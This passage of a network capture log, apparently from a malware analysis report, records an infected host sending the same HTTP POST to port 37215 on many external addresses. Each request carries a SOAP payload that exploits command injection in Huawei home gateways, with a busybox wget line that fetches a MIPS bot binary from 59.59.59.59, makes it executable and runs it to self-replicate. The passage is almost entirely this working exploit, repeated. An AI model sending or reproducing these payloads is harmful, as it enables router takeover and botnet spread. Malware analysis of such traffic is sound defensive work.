                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          738192.168.2.1533804157.236.99.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.650418043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          739192.168.2.1559912188.59.211.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.650738001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          740192.168.2.1548712175.78.212.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.650805950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          741192.168.2.154669041.86.253.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.651801109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          742192.168.2.1540236197.5.170.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.651819944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          743192.168.2.156044266.74.214.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.651846886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          744192.168.2.1537780197.119.139.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.652075052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          745192.168.2.155891017.11.22.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.652384043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          746192.168.2.1550198218.217.172.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.654954910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          747192.168.2.1554814157.222.175.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.655239105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
